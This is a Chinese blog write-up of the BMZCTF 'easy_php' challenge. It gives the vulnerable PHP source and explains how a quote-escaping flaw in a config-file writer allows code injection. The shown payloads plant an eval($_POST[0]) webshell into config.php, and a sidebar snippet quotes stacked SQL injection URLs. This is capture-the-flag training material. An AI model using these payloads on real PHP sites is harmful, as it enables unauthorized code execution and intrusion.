[第二届BMZCTF]easy_php

最新推荐文章于 2023-09-20 20:47:57 发布
最新推荐文章于 2023-09-20 20:47:57 发布
阅读量464 收藏
点赞数
分类专栏: Write Up 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/122550499
版权

[第二届BMZCTF]easy_php

写在前面的话:元旦打的比赛,现在终于有时间来复现,害,勤能补拙吧!

题目源码

 <?php
highlight_file(__FILE__);
error_reporting(0);

function new_addslashes($string) {
     if(!is_array($string)) return addslashes($string);
     foreach($string as $key => $val) $string[$key] = new_addslashes($val);
     return $string;
 }
if(!get_magic_quotes_gpc()) {
    $_POST = new_addslashes($_POST);
    $_GET = new_addslashes($_GET);
    $_REQUEST = new_addslashes($_REQUEST);
    $_COOKIE = new_addslashes($_COOKIE);
}
if(isset($_POST['sudo'])) {
    $file = __DIR__ .'/config.php';
    require $file;
    $key = $_POST['info']['name'];
    if(!isset($LANG[$key])) {
        $content = file_get_contents($file);
        $content = substr($content,0,-3);
        $data = $content."\n\$LANG['$key'] = '$_POST[no1]';\n?>";
        file_put_contents($file,$data);
    } elseif(isset($LANG[$key]) && $LANG[$key]!=$_POST['no1']) {
        $content = file_get_contents($file);
        $content = str_replace($LANG[$key],$_POST['no1'],$content);
        file_put_contents($file,$content);
    }
}
if(isset($_GET['re'])){
    file_put_contents("./config.php",base64_decode("PD9waHAKJExBTkdbJ21lbWJlcl9tYW5hZ2UnXSA9ICdhZG1pbic7Cj8+Cg=="));
}

分析

代码主要实现的功能是:没有则新建,有的话就将原来的替换成输入的,具体是怎么做到,看核心代码

但是!!题目通过\进行了转义

思路:通过闭合与注释能逃逸,从而能传马,或者任意代码执行

ps:复现过程中想到了sql注入的单引号’闭合,#注释,很类似

过程

首先重置下

?re=1

自己新建一个数组的键和值,no1的内容很关键,为后面替换之后逃逸做铺垫

sudo=&info[name]=Backr0d&no1=LANG

替换LANG之后,成功逃逸出来

sudo=&info[name]=Backr0d&no1=a=1;eval($_POST[0]);phpinfo();//

用蚁剑连接即可在根目录下找到flag

Y3pro
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php_keywords.zip_easy _php insert db
09-24
In this file you can add keywords to `keywords` table of MySQL DB . This code show how to insert data to DB, how to test your input functions in easy ways.
二、BMZCTF-[easy_php]-[本地复现]-[简单的代码审计]
qwsn
01-01 2225
1.addslashes($string):对字符串参数中的预定义字符进行转义,并返回转义后的字符串 2.__DIR__:取出当前脚本执行的物理路径 3.PD9waHAKJExBTkdbJ21lbWJlcl9tYW5hZ2UnXSA9ICdhZG1pbic7Cj8+Cg== <?php $LANG['member_manage'] = 'admin'; ?> 4.file_get_contents — 将整个文件读入一个字符串 5.file_put_contents — 将一个字符串写入
CTF-江苏工匠杯easyphp 题解
百彦子烨的博客
11-04 3952
攻防世界-web新手区-江苏工匠杯-easyphp 题解
CTF-easy_php
m0_62593857的博客
02-01 539
ctf-easy_php
NKCTF-easy_php
Keepb1ue的博客
04-01 2494
第一个弱比较绕过,可以通过magic hash 0e开头或者数组绕过。这个是考php非法传参问题。套娃题,需要绕五个过滤。
[2021N1CTF国际赛]Easyphp-Wp
Y4tacker的博客
11-22 2870
文章目录写在前面Wp简单分析小实验验证猜想可效性构造tar参考文章 写在前面 在各种带飞的情况下,web被带ak了,这里比较想写一个easyphp的wp,这题到结束也只有14个解,其他的懒得写了,本文也只是简单分析 Wp 简单分析 看看首页源码 再看这里很明显是触发phar反序列化 如何插入数据是一个问题,这里没有上传,再看log.php 关键部分源码是这个,我们就应该去想如何去构造,这里phar太难搞了,具体可以看看官方文档关于他的结构,后面最后四位肯定是GBMB多一位都不行,这里想到了tar,本来
dingdan_PHP网站_easy_
10-03
一个简单的订单管理系统,架设简一个简单的订单管理系统,架设简单 A simple order management system easy to set up
easy_sound.rar_easy _webcam rtsp
09-24
簡易的聲音設定及取得.可自行取得webcam相關聲音資料.再配合相關rtsp的lib傳送出去.相關設定方式. /dev/dsp webcam 的聲音來源 RATE 頻率 CHANNELS 聲道
Easy_draw.rar_easy _easy draw_easydraw
09-24
为编程初学者设计的一个小型图像处理软件
PID_EASY_EXPLAIN.rar_easy _pid
09-24
PID深入浅出的解释,有C语言的例子,值得大家看看。
easyphp
最新发布
qq_51979295的博客
09-20 221
php数据类型小综合
Web安全攻防世界05 easyphp(江苏工匠杯)
weixin_42789937的博客
12-04 3798
Web安全攻防世界05 easyphp(江苏工匠杯),呃...我php0基础,自己解题,所以写得会很啰嗦...内容对小白依然非常友好~
【攻防世界】easyphp
RexHa的博客
02-01 4173
攻防世界 easyphp
攻防世界 easyphp
qq_53105813的博客
12-13 938
攻防世界 wp
buuctf easyphp
qq_50613938的博客
12-16 481
我们用这个输出 但我不明白为什么,不能直接把“POST[‘a’];”全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替"GET",然后配合_POST[‘a’];” 全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替"_GET",然后配合P​OST[‘a’];”全都异或掉,这多省事儿了,但好像不行,而且好像还只能是GET型,我尝试了POST类型行不通。目前我就只知道它可以代替".
[GYCTF2020]Easyphp
shinygod的博客
04-06 1288
知识点:反序列化字符串逃逸,pop链构造 反序列化字符串逃逸 此知识点可以结合题目来看。 https://blog.csdn.net/shinygod/article/details/123724105 分析 /www.zip拿源码 在update.php中可以拿到flag,条件$_SESSION['login']===1在lib.php中 <?php require_once('lib.php'); if ($_SESSION['login']!=1){ echo "你还没有登陆呢!"; } $
n1 php,从N1CTF easy_php学到的几个骚操作
weixin_34337134的博客
03-12 292
认真的拜读了师傅们关于N1CTF的各种writeup,收获了不少骚操作,记录下以备查找。反序列化点SoapClient php自带类的利用#使用的是SoapClient这个php自带类# 当反序列化出来的对象调用不存在的函数是,就会调用__call方法,向外发送请求$a = new SoapClient(null, array('location'=> "xxx.xxx.xxx.xxx:80...
end 21-4-19
qq_45781155的博客
04-19 149
强网杯 2019 随便注 http://www.bmzclub.cn:20431/?inject=1';show database;# http://www.bmzclub.cn:20431/?inject=1';show tables;# http://www.bmzclub.cn:20431/?inject=1';show columns from flagg;# http://www.bmzclub.cn:20431/?inject=1';sEt @a=concat("sel","ect fla
[ISITDTU 2019]EasyPHP
wjd19980925的博客
06-08 803
[ISITDTU 2019]EasyPHP
easy_serialize_php
03-16
easy_serialize_php 是一个 PHP 库,用于将 PHP 对象序列化为字符串,以便在不同的应用程序之间传输和存储。它提供了一种简单的方法来序列化和反序列化 PHP 对象,使得数据传输和存储变得更加方便和高效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值